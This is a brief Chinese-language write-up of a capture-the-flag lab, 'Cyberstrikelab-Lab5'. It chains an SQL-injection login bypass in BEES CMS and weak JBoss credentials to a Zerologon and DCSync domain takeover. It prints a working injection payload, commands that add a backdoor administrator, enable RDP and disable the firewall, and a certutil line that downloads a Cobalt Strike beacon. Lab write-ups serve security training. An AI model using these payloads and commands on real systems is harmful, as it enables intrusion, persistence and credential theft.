Cyberstrikelab-Lab5

BEES CMS

fscan扫描到6582端口经过搜索发现后台登录的用户名处存在SQL注入通过联合注入伪造登录

user=-1'+uniselecton+selselectect+1,'admin','e10adc3949ba59abbe56e057f20f883e',0,0+%23&password=123456&code=dd18&submit=true&submit.x=0&submit.y=0

在后台进行上传文件连接成功，在根目录拿到flag1 上线cs，开启RDP，添加后门用户

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable

JBOSS

还存在一个192.168.20.10段其中192.168.20.20开放了8080端口运行jboss 弱密码可以登录到后台：admin/admin 拿小黑的工具进行扫描直接就是system权限直接读flag2 下载定向木马，上线cs

certutil -urlcache -split -f http://192.168.20.10:6582/beacon_x64.exe beacon.exe

rdp的话有点问题，这里直接走winrm吧

Zerologon

还是检查到了zerologon 重置密码走DCsync拿到哈希最后拿到flag3

BEES CMS#

JBOSS#

Zerologon#

BEES CMS

JBOSS

Zerologon